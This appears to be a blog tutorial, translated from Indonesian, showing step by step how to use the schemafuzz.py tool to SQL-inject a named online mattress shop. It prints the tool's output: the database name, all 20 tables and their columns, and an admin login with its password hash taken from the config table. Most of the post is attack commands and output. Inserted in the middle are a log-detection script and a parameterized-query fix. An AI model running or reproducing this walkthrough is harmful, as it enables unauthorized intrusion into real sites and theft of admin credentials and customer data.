What you need to prepare:
1. Python
2. Schemafuzz.py
3. CMD
Open CMD and change into the schemafuzz.py folder.
The general form of the command is: schemafuzz.py -u "target" --perintah (where "perintah", meaning "command", stands for one of the options listed further down)
To make it clearer, let's go straight to the scene, hahaha
1. Find a target. This is our target:
http://www.sleeppost.com/viewproduct.php?pid=923
2. Check the columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol
The output is:
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
[+] Evasion Used: "+" "--"
[+] 09:44:10
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,
[+] Column Length is: 7
[+] Found null column at column #: 0
[+] SQLi URL: http://www.sleeppost.com/viewproduct.ph … +UNION+SEL
CT+0,1,2,3,4,5,6--
[+] darkc0de URL: http://www.sleeppost.com/viewproduct.ph … +1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
[-] Done!
So this is the URL we use for the injection: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
3. Find the database
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dbs
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] ??sleeppo_store?
[-] 09:57:00
[-] Total URL Requests 3
[-] Done
See, the database name is visible, hahaha: sleeppo_store
4. Find the table names in the database
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20
[Database]: sleeppo_store
[Table: Columns]
[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty
[-] 10:24:51
[-] Total URL Requests 139
[-] Done
So the site has 20 tables, and their columns are listed too. Just pick which one you want to exploit :p
5. Exploit the table and columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3
[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data
[-] 10:37:36
[-] Total URL Requests 5
[-] Done
Hehehe... the username and password are now visible; the password just needs to be decrypted ;)
The method above applies to SQL version 5; for version 4, use the --fuzz command to find the table and column names.
e.g.: schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --fuzz
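Every step above leaves the same fingerprints in the web server's access log: `AND 1=2`, `UNION SELECT`, the tool's `darkc0de` placeholder and a trailing `--` inside the `pid` parameter. The following detection sketch is an added example, not part of the original post or of schemafuzz.py; the log lines, IP addresses and the names `RULES`, `scan` and `clients_over` are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Patterns taken from the request strings shown in the tool output above.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "false_predicate": re.compile(r"\band\s+1\s*=\s*2\b", re.I),
    "tool_marker": re.compile(r"darkc0de", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = """\
198.51.100.20 - - [01/Jan/2024:09:40:02 +0000] "GET /viewproduct.php?pid=923 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:09:44:10 +0000] "GET /viewproduct.php?pid=923+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6-- HTTP/1.1" 200 911
203.0.113.7 - - [01/Jan/2024:09:44:12 +0000] "GET /viewproduct.php?pid=923%20and%201%3D2%20union%20select%20darkc0de,1,2,3,4,5,6 HTTP/1.1" 200 907
198.51.100.20 - - [01/Jan/2024:09:45:30 +0000] "GET /search.php?q=mattress+union+square HTTP/1.1" 200 2048
"""

def scan(log_text):
    """Return (client_ip, parameter, matched_rules) for every suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl undoes both "+" and %xx encoding, so either evasion style is normalised.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = sorted(rule for rule, rx in RULES.items() if rx.search(value))
            if hits:
                findings.append((ip, name, hits))
    return findings

def clients_over(findings, threshold=2):
    """Clients with repeated hits; a schema walk like the one above took 139 requests."""
    counts = Counter(ip for ip, _, _ in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print(clients_over(scan(SAMPLE_LOG)))
```

The benign search for "mattress union square" is not flagged because the rule requires `union` to be followed by `select`; the same matching can be moved into a WAF or SIEM rule once the patterns are tuned against real traffic.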
Some commands:
--fuzz >>> finds column and table names on SQL v4
--schema >>> shows the table names
--dump >>> shows the column contents
--findcol >>> finds the darkc0de (column)
Look up the rest yourself. Just read the help.
Links:
Python
Schemafuzz.py
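The whole walkthrough works only because the `pid` value is pasted into the SQL text, so `AND 1=2 UNION SELECT ...` is parsed as part of the statement. The following added example (not from the original post and not the site's code) puts a concatenating lookup beside a validated, parameterized one; it uses an in-memory SQLite table with the seven `product` columns listed in the schema output above, and the row values and function names are constructed.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the product table (same 7 columns as the schema dump).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product "
               "(pid INTEGER PRIMARY KEY, cid, brand, name, pno, detail, recommend)")
    db.execute("INSERT INTO product VALUES (923, 1, 'Acme', 'Mattress', 'M-1', 'Queen size', 0)")
    return db

def view_product_vulnerable(db, pid):
    # The request parameter is concatenated into the SQL text, so the database
    # parses whatever follows the number as SQL.
    return db.execute("SELECT * FROM product WHERE pid=" + pid).fetchall()

def view_product_safe(db, pid):
    # 1) Allow-list: a product id is a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", pid):
        return []
    # 2) Bind the value: the driver sends it as data, never as SQL text.
    return db.execute("SELECT * FROM product WHERE pid=?", (int(pid),)).fetchall()

# The decoded form of the "SQLi URL" parameter printed by --findcol above.
PAYLOAD = "923 AND 1=2 UNION SELECT 0,1,2,3,4,5,6--"

if __name__ == "__main__":
    db = make_db()
    print(view_product_vulnerable(db, PAYLOAD))  # a row that is not in the table
    print(view_product_safe(db, PAYLOAD))        # rejected before reaching the database
    print(view_product_safe(db, "923"))          # the real product row
```

With the bound parameter in place, the column-count probe no longer returns attacker-chosen rows, which is the first thing every later step in the walkthrough depends on.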
2 comments:
Well of course it can be broken into.. that website was made by you, right..! I could show off like that too.!
by hexa
Thanks, bro, for the tutorial.... I'll try to study it some more so I can be as smart as you...